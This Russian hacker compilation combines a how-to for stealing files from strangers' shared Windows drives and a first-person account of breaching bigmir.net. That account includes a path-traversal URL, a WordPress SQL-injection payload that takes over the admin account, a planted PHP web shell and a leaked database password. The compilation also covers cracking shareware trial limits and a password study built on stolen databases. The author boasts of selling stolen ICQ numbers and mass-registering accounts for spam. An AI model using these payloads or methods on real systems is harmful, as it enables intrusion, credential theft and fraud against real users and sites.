Для чего нам Windows 2k? Да очень просто - по моим наблюдениям все сканеры лучше и корректнее работают под 2000, кроме этого когда вы нашли потенциальную жертву вам нужно изменить вашу рабочую группу на группу установленную на компьютере жертвы в Windows 2000 это делается так: правая кнопка мыши на >Мой компьютер> выбираем >Сетевая идентификация >Свойства, в нижней части там где написано "Является членом:" должна стоять галочка "Рабочей группы" вы пишите нужное вам имя рабочей группы, нажимаете "ОК" и вам высвечивается приветствие "Добро пожаловать в рабочую группу такую-то", вы нажимаете кнопочку "ОК" и вам предлагается перезагрузить компьютер для вступления в силу изменений, в этот момент вы должны не нажать кнопочку "ОК", как ранее, а просто закрыть окошко, теперь вам просто нужно нажать "ОК" на "Свойствах системы" и опять вас предупредят о том что нужно перезагрузить компьютер, на что вы должны категорично ответить "НЕТ". Поздравляю - изменения вступили - таки в силу без всяких там перезагрузок. В этом еще одна изюминка Windows 2000, поскольку в системах "для домохозяек", а именно 9х, Ме изменения вступают только после перезагрузки! А это все время: время на перезагрузку, на подключение к интернет - в результате вполне возможно, что когда вы подключитесь к интернет после перезагрузки жертвы уже там не будет. Экономьте время!!!

Зачем жен нам Essential NetTools v3.0? Как было сказано выше - это сканер (более подробное описание вы сможете найти на страничке скачивания), нам же достаточно знать что он позволяет сканировать диапазон IP-адресов на расшаренные ресурсы, и выборочный адрес на шары (расшаренные, шары - ресурсы доступные пользователям рабочей группы, а следовательно и вам!), а также, что тоже немаловажно!, подбирать пароли доступа (не думайте что это такая уж быстрая процедура, но, как правило, в большинстве случаев лица с расшаренными ресурсами - это либо ломаки, либо лица чересчур самоуверенные, либо секретарши на фирмах (кстати почему бы им всем не подумать о безопасности?) у которых пароль подбирается буквально с первой - второй попытки:-))) Кроме того, она позволяет подключать эти самые шары к вашему компьютеру без головной боли (но эта процедура итак не очень утомительная). Ну вроде по этому поводу - все....

HakTek v1.1 - в принципе особой необходимости в этой программе нет, но все-равно рекомендую скачать - мне больше всего нравится Finger Session. Вобщем - читайте описание на страничке скачивания. Зачем нам Advanced Dialer? Вроде бы простая звонилка... Но у нее есть одна хорошая черта. Вы хотите иметь пароли пользователей вашего провайдера? Тогда ставьте Advanced Dialer ибо он при подключении показывает и ваш IP-адрес и, что самое главное, IP-адрес сервера провайдера к которому вы подключены (так же как и многие другие пользователи!!!;-))) - вот это главное!

Ну, предположим, что вы выполнили все рекомендации. Теперь начнем работу на примере кражи документов с диска С компьютера подключенного к тому же провайдеру что и вы:

1. Подключаемся к интернет при помощи Advanced Dialer и смотрим IP-адрес сервера провайдера (как правило он никогда не изменяется, так что смело можете записывать его на бумажку), допустим 194.153.128.132 - реальный IP-адрес провайдера ZEOS

2. Запускаем Essential NetTools v3.0 и выбираем NBScan, там вводим начальный IP-адрес для сканирования "Starting IP adress" (в нашем случае пусть это будет например 194.153.128.0) и конечный IP-адрес "Ending IP adress" (в нашем случае это пусть будет 194.153.128.75, вообще-то конечным должен был бы быть IP 194.153.128.255, но я никогда не видел чтобы кто-то был подключен к адресу более 194.153.128.72, поэтому тратить кучу времени на сканирование еще 180 адресов по-моему просто глупо...

3. После того как процесс сканирования окончен мы увидим примерно следующее:

NAME WORKGROUP RS IP Adress MAC Adress
 Legioner Legion666 Yes 194.153.128.15 это нас не интересует
 Vovan Workgroup No 194.153.128.19 это нас не интересует
 Dmitriy Venera Yes 194.153.128.21 это нас не интересует
 Sinelnikov Claus Yes 194.153.128.32 это нас не интересует

Kinder Troja Yes 194.153.128.43 это нас не интересует
Sky Circus Yes 194.153.128.47 это нас не интересует
Trishka Killers No 194.153.128.64 это нас не интересует
Judge Dred No 194.153.128.69 это нас не интересует


4. Мы видим имена, рабочие группы, RS - расшаренные ресурсы, IP-адреса, адреса МАК компьютеров с NetBios Sessions (то есть с открытым 139 - м портом) Кстати не забудьте включить у себя NetBios - иначе ничего не будет, также для личной безопасности сделайте все диски и принтеры локальными (защитите их от чтения и записи). Нам нужны только: рабочая группа, RS, IP-адреса. Если RS - No - об этом компьютере можно сразу забыть. Если же -Yes, то можно попробовать подключится к нему. Для этого:


   1. Включаем NAT
   2. Вводим адрес IP - например 194.153.128.15 и нажимаем "SCAN"
   3. Теперь немного подождем...


Что мы видим:

* Checking 194.153.128.47 ...
 * Obtained NetBIOS name table:
 SKY

SKY
CIRCUS
SKY
CIRCUS
DAN
CIRCUS
..__MSBROWSE__.
* Trying username "ADMINISTRATOR", password "": failed - начало подбора пароля
* Trying username "ADMINISTRATOR", password "ADMINISTRATOR": failed

* Trying username "ADMINISTRATOR", password "GUEST": failed
* Trying username "ADMINISTRATOR", password "ROOT": failed
* Trying username "ADMINISTRATOR", password "ADMIN": failed
* Trying username "ADMINISTRATOR", password "PASSWORD": failed
* Trying username "ADMINISTRATOR", password "TEMP": failed
* Trying username "ADMINISTRATOR", password "SHARE": failed
* Trying username "ADMINISTRATOR", password "WRITE": failed
* Trying username "ADMINISTRATOR", password "FULL": failed
* Trying username "ADMINISTRATOR", password "BOTH": failed

* Trying username "ADMINISTRATOR", password "READ": failed
* Trying username "ADMINISTRATOR", password "FILES": failed
* Trying username "ADMINISTRATOR", password "DEMO": failed
* Trying username "ADMINISTRATOR", password "TEST": failed
* Trying username "ADMINISTRATOR", password "ACCESS": failed
* Trying username "ADMINISTRATOR", password "USER": failed
* Trying username "ADMINISTRATOR", password "BACKUP": failed
* Trying username "ADMINISTRATOR", password "SYSTEM": failed
* Trying username "ADMINISTRATOR", password "SERVER": failed

* Trying username "ADMINISTRATOR", password "LOCAL": failed
* Trying username "GUEST", password "": failed
* Trying username "GUEST", password "ADMINISTRATOR": failed
* Trying username "GUEST", password "GUEST": succeeded - пароль успешно подобран
* Obtained share list: - список возможных доступных ресурсов
IPC$ Remote IPC
E$ Default share
D$ Default share
C

ADMIN$ Remote Admin
C$ Default share
* Obtained server information:
Server=[SKY] User=[] Workgroup=[SKYGROUP] Domain=[]
* Checking share E$: access denied - доступ запрещен
* Checking share D$: access denied - доступ запрещен
* Checking share C: read-write access - доступ разрешен для чтения-записи
* Checking share ADMIN$: access denied
* Checking share C$: access denied

* Finished checking 194.153.128.47


Ну вот мы и нашли подходящую жертву! Как видно из списка, мы можем подключиться к диску С (разрешен доступ для чтения и записи), то есть мы можем записывать жертве на диск, стирать с его диска, копировать с его диска!

Теперь нам нужно подключить удаленный компьютер. В этом нет ничего сложного. Для этого нам нужно изменить рабочую группу согласно вышеописанному способу. В Essential NetTools открыть NBScan и выделить потенциальную "жертву", в нашем случае это Sky с рабочей группой Circus и IP-адресом 194.153.128.47, нажать правую кнопку мышки и выбрать в контекстном меню "Open computer". В ответ откроется стандартное окно Windows где будет присутствовать диск "С". Наводим на этот самый диск "С" нажимаем правую кнопку мыши и в контекстном меню выбираем "Подключить сетевой диск", когда главный каталог будет считан мы можем начинать "лазить", а точнее сказать "ползать" по диску "С" удаленного компьютера с адресом 194.153.128.47, делать это можно при помощи стандартного "Проводника", Windows Commander и других программ.



Взлом на bigmir.net (ICQ)
Нет ничего невозможного!

Я принялся изучать локализованных партнеров Icq.Com в различных странах: nana.co.il, rambler.ru, mynet.com, abv.bg, zoznam.sk, netvigator.com, prosieben.de, atlas.cz и bigmir.net. Для этого я скачал крякнутый сканер уязвимостей XSpider 7.5 (ссылку приводить не буду, поскольку это незаконно, но ты можешь поискать ее сам на различных форумах, посвященных хаку) и запустил его на своем компе с указанными выше доменами для их проверки. Спустя час прога выдала мне первые результаты :). Жертва была найдена - украинский портал bigmir.net с PR=8 по Гуглу (в России сайтов с таким пиаром всего три).

Сама ядовитая ссылка выглядела так:

http://www.bigmir.net/?u=../../../../../../../../../../../../../../../etc/passwd

Очень похоже на локальный инклуд с null-байтом. Но, как позже выяснилось, это было далеко не так. Этот баг позволял лишь просматривать файлы в системе, а до выполнения php-кода дело не дошло. Код в исходнике главной страницы Бигмира выглядит так:
$u = @$_GET['u'];
...
@readfile($staticDir .'rating'.$t.$u.'.html');

Просмотрев некоторые системные файлы (например, www.bigmir.net/?u=../../../../../../../../../../usr/local/etc/apache22/extra/httpd-vhosts.conf), я решил пока отложить эту уязвимость и идти дальше.
Хорошие соседи

Как видишь, даже в таком серьезном портале уже на главной странице обнаружился очень серьезный баг. Но с него ничего хорошего поднять было нельзя. Поэтому следующим моим шагом стало изучение сайтов, расположенных на том же сервере, что и bigmir.net. Я зашел на всем известный сервис IP-lookup http://domainsdb.net, вбил туда наш любимый Бигмир и стал смотреть результаты.

На самом IP-адресе Бигмира других сайтов не было, а вот на его же NS я увидел пару сайтиков: http://korrespondent.net и http://ricardo.com.ua, ссылки на которые были на главной странице нашего портала. Немного поизучав новых пациентов, я наткнулся на их форумы (http://forum.korrespondent.net и http://ricardo.com.ua/forum). Наметанный глаз сразу узнал скрипты борды. И там, и там стоял Phorum. Но, чтобы начать какие-либо хакерские действия, необходимо было узнать версию форума. Пройдя по ссылке http://forum.korrespondent.net/admin.php, я обнаружил надпись: «Version 5.1.16a». Для нее, конечно, были известные баги, но паблик-сплоитов под них не существует, а ковыряться с blind SQL-injection не позволяла лень. Смотри сам, небольшой PoC-сплоит (работающий, конечно, после логина на форум и подстановки существующих id форума и темы):
<html>
<body>
<form method=POST action="http://forum.korrespondent.net/pm.php">
<input type="hidden" name="recipients[123']" value="testers">
<input type="hidden" name="action" value="post" />
<input type="text" id="subject" name="subject" size="50" value="" />
<textarea id="message" name="message" rows="20" cols="50"></textarea>
<input type="hidden" name="forum_id" value="1" />
<input type="submit" name"test" value="test">
<input name="preview" value=" Preview " />
</body>
</html>

Далее я совершил те же самые действия и со вторым форумом, но админки по этому адресу не было. В итоге, ковыряясь с этими форумами, я нашел только одну интересную особенность: если пройти по ссылке http://ricardo.com.ua/forum/docs, то в окне браузера можно наблюдать следующую забавную картину:

Warning: main(./docs) [function.main]: failed to open stream: Invalid argument in /storage/web/htdocs/ricardo/pages/forum.tpl on line 47
Fatal error: main() [function.require]: Failed opening required './docs' (include_path='.:/usr/local/share/pear') in /storage/web/htdocs/ricardo/pages/forum.tpl on line 47

Но, опять же это все была ерунда, нужен был более серьезный баг.
Истина где-то рядом

Выбрав в качестве своей основной жертвы http://korrespondent.net, я продолжил хождение по этому ресурсу и через несколько минут наткнулся на http://blog.korrespondent.net, на главной странице которого в самом низу было написано: «Блог Korrespondent.net работает на WordPress». Увидев эту надпись, я обрадовался, поскольку WordPress - крайне дырявый движок, следовало только узнать его версию, для чего я прошел по ссылке http://blog.korrespondent.net/readme.html. На открывшейся паге гордо красовалась вторая обрадовавшая меня за последние несколько минут надпись: «WordPress 1.5» :). Я ринулся на http://milw0rm.com, вбил там в поиск название движка и увидел кучу очень неплохих сплоитов, из которых выбрал Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit), так как он был последним для ветки 1.5, запустил его и... ничего не получил :(. Огорчению моему не было предела. Значит, на исследуемом сайте стоял WordPress 1.5.2, для которого не было паблик-сплоитов. Эта неудача вынудила меня забить на несколько дней на взлом Бигмира.
WordPress под ударом

Естественно, этим история не заканчивается :). Погуляв пару дней на свежем воздухе, я подумал, а почему бы самому не поискать баги в движке блога, чем немедленно и занялся. Зашел на официальный сайт движка http://wordpress.org, далее - в архив раздела Download и скачал оттуда последнюю версию из первой ветки - 1.5.2. Установил блог на локалхосте и принялся за раскопки :). На поиск бага ушло несколько часов и пара литров пива, я копал каждый файл, мучал параметры, листал исходники... И в итоге мои старания были вознаграждены! Банальная скул-инъекция присутствовала в файле ./wp-admin/user-edit.php в 69-й строке:

$result = $wpdb->query("UPDATE $wpdb->users SET user_login = '$new_user_login', user_firstname = '$new_firstname', $updatepassword user_lastname='$new_lastname', user_nickname='$new_nickname', user_icq='$new_icq', user_email='$new_email', user_url='$new_url', user_aim='$new_aim', user_msn='$new_msn', user_yim='$new_yim', user_idmode='$new_idmode', user_description = '$new_description', user_nicename = '$new_nicename' WHERE ID = $user_id");

Итак (трубят фанфары)... У нас на операционном столе - новый приватный баг WordPress, найденный твоим покорным слугой :). Для его использования необходима регистрация на уязвимом блоге. Вообще он находится в файле wp-register.php, но на Korrespondent.net была сделана общая регистрация для всех сервисов сайта, поэтому, зарегавшись и залогинившись на сайте, я прошел по ссылке http://korrespondent.net/wp-admin/user-edit.php и сохранил страничку себе на винт. Далее, открыв ее в блокноте, я нашел следующий участок html-кода:
<form name="edituser" id="edituser" action="user-edit.php" method="post">
<table width="99%" border="0" cellspacing="2" cellpadding="3">

Заменил его:
<form name="edituser" id="edituser" action="http://blog.korrespondent.net/wp-admin/user-edit.php" method="post">
<table width="99%" border="0" cellspacing="2" cellpadding="3">

Затем нашел hidden-поле с user_id и заменил его:
<textarea name="user_id" rows="5" id="new_description" style="width: 99%; "> </textarea>

После всех перечисленных действий я сохранил заряженную страницу и открыл ее в браузере.

Теперь необходимо сделать небольшое пояснение, касающееся найденной уязвимости: из SQL-запроса видно, что при update пользовательского профиля вообще не проверяется параметр $user_id, то есть таким образом мы можем обновить профиль любого юзера, но прежде всего нам необходим админ. Как просто и быстро поставить админу свой пароль? А вот как.

В нашей ядовитой страничке вписываем в поля с логином и паролем любые логин и пароль, например tester/tester, а в бывшее hidden-поле вбиваем: «-99 or user_level=10/*» (естественно, без кавычек). В итоге, наш скул-запрос получается следующим:

UPDATE wp_users SET user_login = 'tester', user_firstname = '',user_pass=MD5('tester'), user_lastname='', user_nickname='', user_icq='', user_email='', user_url='', user_aim='', user_msn='', user_yim='', user_idmode='', user_description = '', user_nicename = '' WHERE ID =-99 or user_level=10/*

Так как юзера с ID=-99 однозначно не существует в базе данных, обновятся данные лишь юзера с user_level=10, то есть данные админа :).
Ленивые админы

Став админом blog.korrespondent.net, я задумался над получением шелла на сервере. Скажу по секрету: у меня есть еще один обнаруженный мной приватный баг, позволяющий легко и безболезненно получать шелл из админок WordPress версий 1.5-2.1. Но тебе хватит и предыдущего привата :). Эта уязвимость все равно мне не понадобилась, поскольку, зайдя в «Редактор шаблонов», я увидел, что все php-файлы в template-директории открыты на запись. Теперь необходимо было тайно встроить свой шелл в один из уязвимых файлов. Я быстро набросал следующий php-код:
<?
isset($_GET[fuckkk]) ? print `$_GET[fuckkk]` : '';
?>

И вписал его в template шапки блога. Таким образом, по адресу http://blog.korrespondent.net можно было видеть обычный блог, а на http://blog.korrespondent.net/?fuckkk=[команда] - красивый и удобный шелл :).

А дальше я начал изучение сервера bigmir.net. В первую очередь меня интересовала база данных Бигмира. Отправившись на поиске параметров подключения к базе, я нашел файл /storage/web/htdocs/bigmir/bigmir2/config.php, в котором находились следующие строки:
// production
define('BM_DB_HOST', 'cbd2.sm');
define('BM_DB_USER', 'bigmir');
define('BM_DB_PASS', 'NacDagegWukecBi');

Далее я закачал на сервер скрипт управления БД от RusH Security Team (http://mentat.sibintercom.ru/Nemo/dump/rst_sql.txt, на официальном сайте скрипт недоступен) и поставил его по адресу http://files.korrespondent.net/img/forall/a/4/header.php. Залогинившись с полученными данными, я минуту наблюдал долгожданную картину - все таблицы Бигмира были передо мной :). Немного походив по ним, я нашел таблицу с юзерами в bm_global.user. Полтора миллиона регистраций, все пароли к аськам в открытом виде! Ну не чудо ли?
Что дальше?

Продав все пяти-, шести- и семизначные номера из базы Бигмира с помощью друзей, я задумался, а что же делать дальше? Перспективы открывались огромные: во-первых, в моих руках был клиентский API партнеров icq.com (наблюдать его ты также можешь на скриншоте в журнале); во-вторых, мой шелл на протяжении двух недель никто не палил; а в-третьих, я нашел таблицу с админами Бигмира и у меня был доступ к http://admin.bigmir.net (сейчас доступ к админке возможен лишь с определенных IP-адресов).

Решив пойти по пути наименьшего сопротивления, я стал изучать регу номеров. В результате в файле /storage/web/htdocs/bigmir/include/icq_ips_class.php я увидел следующую функцию:

function register($password, $email, $nickName, $firstName = false, $lastName = false, $birthDay = false, $sex = false, $country = false, $city = false, $state = false)
{
...
}

И стал ваять автореггер ICQ-уинов. Создал php-гейт на Бигмире, где в цикле запустил указанную выше функцию, затем на том же php написал клиент к этому гейту и с помощью программы php2exe, которую ты можешь часто видеть на дисках, прилагаемых к журналу, перевел его в экзешник. Процитирую одного из первых покупателей этой программы (kaleostra): «Купил - доволен; итак, тесты: 10 мин, 4100 номеров с семи копий, 410 в минуту с семи копий, 59 номеров в минуту с копии! Ресурсы не жрет вообще».

Как видишь, результаты ошеломляющие :). Но этого было, как обычно, мало. За несколько часов товарищ Cash написал GUI-интерфейс на Delphi с поддержкой потоков, и получилась довольно симпатичная прога, которую ты можешь наблюдать на скриншоте. За одну ночь 4 человека зарегали более полумиллиона уинов, в результате Бигмир повис надолго. Затем была отключена регистрация номеров, и на сервере украинского портала стали проводиться какие-то технические работы. Через день все мои бэкдор-шеллы удалили, был установлен WordPress последней версии и изменены пароли всех админов Бигмира. Но меня это ничуть не расстроило :). Покопавшись в слитом движке Бигмира, я нашел скул-инъекцию, с помощью которой снова получил доступ к базе данных :). Правда, через несколько часов его перекрыли.

В итоге, было продано очень много элитнейших уинов, зарегистрировано очень много девяток для спама (у меня самого до сих пор лежит около 250k, если будут нужны - обращайся), и, что самое главное, был подорван авторитет не только локализованного партнера icq.com http://bigmir.net, но и всего AOL'а.

На этом следует остановиться. Как видишь, даже очень крупные проекты не могут устоять перед хакерами. Стоит задуматься, какой из локализованных партнеров будет следующей жертвой безжалостного ICQ хакерского андеграунда? ;)



Взлом Share-ware софта
Time Machine - это программы, которые эмулируют для какой-то конкретно проги другое время. Не такое какое установлено в системном таймере. Раньше что-то похожее было в DOS'е под названием SetVer. Только он эмулировал не время а другую версию операционки. Такие программы очень выгодно использовать, т. к. одну Time Machine можно использовать для всех без исклю чения trial-прог, а вмешательства в сам код нет. Т. е. шансы что ты испортишь прогу равны 0%. Но в то же время прога осается не зарегестрированной, а значит часть функций от Тебя скрывается.

Extractor - это прога для вскрытия некоторых типов защит. Дело в том, что многие программеры не придумывают свою защиту а используют уже готовую. Так вот extractor вскрывает некоторые защиты такого типа. Хотя для каждой проги пишется свой Extractor, он может пригодиться и для других прог с такой же защитой, правда могут возникнуть глюки. Но большинство прог используют свою защиту, а с ними Extractor'ы не действуют.

Ну а StrangeCrack - это проги, которые ломают сразу всеми возможныи методами. Действуют либо 100% либо гробят программу. Ну и хрен с ней. С программой. Правда глюки все равно могут быть. Ну а теперь давай попробуем сломать что-нибудь сами. Вначале давай подумаем где прога может хранить даные о сроке истекания действия. Правильно - в своих файлах и в системных файлах Windows (это конечно если Ты пользуешься МастДаем). Если файлы храняться в ее файле, то можно вначале опробовать посмотреть все файлы ini, sys, dat и подобные. Лично я всегда просто пускаю поисковик по тексту. Из примеров прог которых можно хакнуть таким способом я могу привести пример SciDoctor. Но это не лучший вариант. Просто циферок таких может оказаться очень много. Если дата хранится в системных файлах Windows то это уже легче. Системные файлы Windows - это win.ini, user.dat и system.dat. User.dat и system.dat - это реестр. Так чтонайти дату в двух местах можно особо не напрягаясь. Для лазанья по реестру лучше использовать Regedit из 95виндов. Он мне как-то больше нравится. Ну вот и все. Напоследок хотим только посоветовать проги RegMon и FileMon. Они отслеживают все изменения в файлах и реестре. С их помощью найти что Тебе надо будет гораздо проще. Удачного взлома!


Самые часто задаваемые пароли
Intro

По моей просьбе, люди, знакомые по интернету, собрали базу данных для этого исследования. Во время стадии сбора информации в основном использовались уязвимости типа SQL-injection (позволяющие пользователю выполнять любые запросы к базе данных, установленной на сервере), XSS (cross-site-scripting, позволяет взломщику внедрить в страницу свой html-код, что дает возможность украсть cookies администратора и затем подделать сессию), а также простые оплошности системных администраторов, когда из-за неправильной конфигурации сервера базу данных мог просматривать любой человек.

В результате этой работы была собрана база данных вида "логин:пароль", содержащая 52125 записей. Большую часть (42920, 82,3%) из них представляли md5-хэши, остальные (9205, 17,7%) - пароли в виде plain-text (незашифрованные) или пароли, зашифрованные алгоритмами, допускающими построение обратной функции - то есть расшифровку (например base64). Использование в интернет-проекте публичных алгоритмов, позволяющих декриптовать пароль, не дает никакой защиты и, по сути, ничем не лучше хранения паролей в открытом виде.

В собранный базе данных есть пароли, заданные пользователями разных наций, но подавляющее большинство приходится на русских (около 40%) и американцев (почти 20%), остальные - в основном европейцы (немцы, поляки, чехи, англичане). Азиатов - единицы.

Атака на MD5

После сбора информации для проведения анализа необходимо было взломать хотя бы некоторую часть полученных md5-хэшей. Для тех, кто не сведущ в криптографии или программировании, попытаюсь объяснить суть этого алгоритма. Приведем общее определение хэш-функции - это преобразование, которое позволяет из данных произвольной длины получить некое значение фиксированной длины. Известный пример такой функции - crc32, контрольная сумма файла. Хэш-функции также бывают криптографическими и программистскими. Нас интересует первый вариант. Основными свойствами хэш-функций, применяемых в криптографии, являются необратимость и свободность от коллизий. Необратимость означает, что нельзя разработать алгоритм, который на основе известного хэша позволяет получить исходные данные (грубо говоря, зная хэш пароля, получить сам пароль). Свободность от коллизий - практическую невозможность подобрать два разных исходных аргумента, значение хэш-функции для которых будет одинаковым. MD5 - публичный алгоритм, являющийся криптографической хэш-функцией, поэтому единственный возможный тип атаки на него - зашифровка всех возможных значений пароля и сравнение полученного результата с известным хэшем. Более подробно об алгоритме md5 можно почитать в RFC1321 (www.faqs.org/rfcs/rfc1321.html).

Для взлома md5-хэшей я использовал программу Passwords Pro v1.2.0.1 (http://www.InsidePro.com). С ее помощью удалось взломать 21249 паролей из 42920 (49,5%). Уже исходя из этих данных можно утверждать, что почти половина всех используемых сейчас паролей - ненадежные. Были подобраны все пароли, длина которых менее 5 символов и все численные пароли, длина которых менее 10 символов. Заявленная разработчкиком скорость для разных процессоров:

Intel Pentium-III 1000 MHz ~2,2 миллиона паролей/секунду

AMD AthlonXP 1700+ (1466 MHz) ~3,6 миллиона паролей/секунду

Intel Pentium-4 2400 MHz ~4,0 миллиона паролей/секунду

Реальная скорость перебора для моего компьютера (AMD AthlonXP 1600+) составляла около 3,2 миллионов паролей в секунду для взлома одного пароля и падала приблизительно до 200 тысяч паролей в секунду при одновременном взломе 8000 паролей (это происходит из-за того, что программе необходимо сравнить значение хэш-функции, полученное для проверяемого пароля, со всеми известными хэшами, загруженными в нее). Максимальное время, требующееся для подбора пароля, рассчитывается по следующей формуле:

[image]

где N - количество символов в наборе, из которого составляется пароль, L - предельная длина пароля, S - число проверок в секунду. Например, если рассчитать по этой формуле время, которое потребуется для перебора всех численных паролей длиной до 9 символов (S=3*106, N=10 (цифры), i=8), то получим всего лишь 37 секунд.

Однако метод полного перебора всех возможных комбинаций хорош либо для малого числа символов в наборе, либо для паролей небольшой длины (4-5 символов). Так для перебора на обычном компьютере всех возможных паролей (могут включать 224 печатных символа) максимальной длинной 6 символов уже требуются 490 суток.

Кроме атаки полным перебором использовалась атака по словарю, когда возможные пароли не генерируются программой, а берутся из файла-словаря, заранее составленного пользователем.

Анализ

Из полученной базы были удалены записи, с одинаковыми логинами и паролями. Вероятность того, что эти учетные записи были созданы одним и тем же человеком, довольна мала, но я решил все-таки учесть и ее. В результате всего было проанализировано 30,450 паролей разных пользователей. Для сбора статистики была написана специальная программа, так как обработать вручную такой массив данных не представляется реальным.

Популярные пароли. 15 самых популярных паролей и количество пользователей, избравших их, приведено ниже:

123456 - 449 пользователей
123 - 303 пользователя
12345 - 288 пользователя
qwerty - 206 пользователей
12345678 - 148 пользователей
111 - 113 пользователей
1234 - 103 пользователя
666 - 85 пользователей
123321 - 77 пользователей
1111 - 77 пользователей
111111 - 76 пользователей
gfhjkm - 76 пользователей
password - 71 пользователь
1234567 - 69 пользователей
777 - 65 пользователей

Более полный список (50 самых популярных) может быть найден в интернете на http://www.x-hack.ru/Antalos/popular.html. Исходя из этих данных, можно сказать, что в целом за последние время наблюдается упрощение паролей, используемых пользователями. Так, по данным, собранным Solar Designer, в начале 90-х самыми популярными паролями являлись:

12345
abc123
password
passwd
123456
newpass
notused
Hockey
Internet

Конечно, приведенные пароли также не надежны, но среди них нет ни одного длиной менее 4 символов или состоящего из одинаковых цифр (111).

Логин в пароле. Целых 729 (2%) паролей оказались абсолютно идентичными имени пользователя, не изменялся даже регистр букв (m2t4:m2t4, salavat:salavat). Еще 314 представляли собой различные модификации логина - добавление одной/нескольких цифр в начале или конце (jotum:1jotum, skiz:skiz57); запись всего логина или его части в обратном порядке (chap118:811pahc, zoran58:naroz85); добавление фамилии к имени (korey:koreyblake); запись в другом регистре (dorofeyOROFEY). При желании взломщик может собрать дополнительную информацию о пользователе (благо сделать это не так уж и сложно), и перебрать возможные варианты. Если учесть что в большинстве случаев добавляют сочетания вроде 1, 123 или год рождения, а процесс генерации подобных комбинаций можно автоматизировать, то такие пароли являются небезопасными и могут быть подобраны довольно быстро.

Атака по словарю.

Большинство пользователей выбирают пароль, который несет какую-то смысловую нагрузку, что позволяет взломщику использовать атаку по словарю - перебор паролей из заранее составленного списка. Как основу для составления такого списка зачастую используют толковые словари языка, также распространена практика составления словарей по художественной литературе. Во втором случае, из книги в электронном формате с помощью специальной программы выбираются все использованные в ней слова, за исключением форм слова в разном числе или падеже. Второй подход считается более продуктивным, так как он позволяет собрать активно используемый лексикон языка, а списки на основе различных словарей получаются большими, но большая часть времени уйдет на проверку вариантов, которые фактически не используются в качестве паролей (специальные термины и т.п.). Также составляют списки наиболее употребляемых паролей, в которые могут входить и числа.

Модификация слова (запись в обратном порядке, удвоение, добавление цифр и т.п.) не спасает, так как с помощью написанной за 10 минут программы или готового софта на основе базового словаря можно быстро сгенерировать все эти варианты и проверить. Существуют даже программы, которые заменяют буквы схожими по начертанию цифры (coolpass станет c00lpa55). Так что такие, казалось бы надежные, уловки не приводят к повышению устойчивости используемого пароля. Не думайте, что вы окажетесь умнее взломщика. Если хотите сделать свой пароль неуязвимым к словарной атаке - выбирайте бессмысленные комбинации символов.

В моем случае по словарям удалось подобрать 14176 (46,5%) паролей. Как видно, почти половина пользователей выбирает осмысленный пароль. Из этих паролей 6938 (22,8% от всех паролей) были подобраны всего лишь по двум маленьким словарям, в которые входят самые популярные пароли. Приведу краткую статистику по словарям, которые оказались наиболее эффективными (через запятую указано количество слов в словаре, затем число подобранных паролей):

популярные пароли, 2153 - 5068
более полный словарь популярных паролей, 13958 - 6924
названия рок-групп и имена музыкантов, 12340 - 890
имена разных народов, 39132 - 1357
русские слова, набранные в английской раскладке, 138204 - 1406
русские слова, набранные транслитом, 138204 - 1958
слова разных народов, 3,162,009- 10685
слова разных народов, записанные в обратном порядке, 3,162,009 - 9223

Стоит упомянуть, что по словарю, который использовался червем Морриса (419 слов), было подобрано всего 389 паролей. А в 1988 году этот вирус смог поразить 6200 компьютеров, это еще раз показывает, что наиболее употребляемые пароли изменяются с течением времени.

Более полную статистику по использованным словарям можно посмотреть в интернете на http://x-hack.ru/Antalos/dics.html.

Статистика по длине и составу паролей. В результате анализа пароля по их длине и составу была создана таблица, в которой можно наглядно увидеть наиболее популярные типы паролей. Во второй колонке указывается количество символов в наборе, из которого составлен пароль, что удобно для некоторых расчетов. Так, чтобы вычислить количество паролей определенного типа, необходимо рассчитать число размещений с повторениями, что делается по следующей формуле:

P=nr

где P - количество размещений (паролей), n - количество элементов множества, из которого осуществляется выборка (символов в наборе), r - число элементов (максимальная длина пароля).

длина пароля
состав пароля символов
в наборе<=3 4 5 6 7 8 >8 сумма %
мал. 26 616 1371 2063 4180 2664 2663 768 14325 47,09
цифры 10 1003 1747 1309 4712 1441 2289 119 12620 41,48
мал.+цифры 36 24 134 314 572 392 623 305 2364 7,77
малые+бол. 52 18 59 80 117 67 88 37 466 1,53
бол. 26 34 58 37 42 21 17 1 210 0,69
мал.+бол.+цифры 62 2 2 4 21 21 43 27 120 0,39
мал+спец 58 1 18 21 13 27 18 11 109 0,36
кириллица 66 5 8 30 12 12 8 7 82 0,27
бол.+цифры 36 1 10 14 15 6 11 10 67 0,22
спец.символы 32 13 4 0 2 1 0 0 20 0,07
мал+бол+спец 84 0 0 6 3 2 3 1 15 0,05
мал+спец+цифры 68 0 3 0 0 1 2 4 10 0,03
цифры+спец 42 5 1 0 0 0 2 0 8 0,03
мал+бол+сп+циф 94 0 0 0 0 1 0 3 4 0,01
бол+спец 58 0 1 0 0 0 0 1 2 0,01
сумма 1722 3416 3878 9689 4656 5767 1294 30422
% 5,66 11,23 12,75 31,85 15,30 18,96 4,25

Некоторые пояснения - через "мал." и "бол." обозначены строчные и прописные латинские буквы соответственно. "Спец." - спецсимволы (например !@#). В строку кириллица вошли пароли, содержащие в себе символы русского или других национальных алфавитов, но не обязательно полностью состоящие из них (то есть пароль "паroL12" также подпадает под эту графу). В сводную таблицу не вошли 28 паролей, содержащих символы, единственный способ ввода которых - использование дополнительной клавиатуры, для введения символа через его код, например ®.

Из приведенной таблицы несложно сделать выводы - самая популярная длинна пароля - 6 символов, состав - малые латинские символы или цифры. Более того, длина 85,6 процентов всех паролей менее 8 символов, а состоят они из малых букв или цифр (в таблице выделены оранжевым). Подсчитаем время, которое необходимо для взлома md5-хэшей таких паролей на локальном компьютере. За среднюю скорость возьмем 3 миллиона вариантов в секунду, тогда по уже известной формуле получим:

* Для малых букв: 20,109 (часов)
* Для цифр: 0,01 (часов)

То есть, грубо говоря, вероятность того, что вы менее чем за сутки взломаете среднестатистический пароль, зная его md5-хэш, - 85%!

Еще несколько фактов. Среди собранных паролей оказались 53 пароля системных администратора (логины admin, administrator, webmaster). На общем фоне их пароли кажутся более надежными, но большая часть уязвима для атаки по словарю.

Основные правила, применяемые пользователями, для генерации пароля путем изменения словарного слова или логина:

* добавление цифры в начале и/или конце пароля (в большинстве случаев - 0,1,…,9; 1,12,123,…; 00,11,…,99; 10,20,…,90; зачастую - год рождения)
* зеркалирование (matrix=xirtam)
* умножение слова, возможны разделители (moneymoney; zero-zero)
* умножение с зеркалированием (pepperreppep)
* запись в другой раскладке (валера =dfkthf)
* эксперименты с регистром букв (eXcesS)
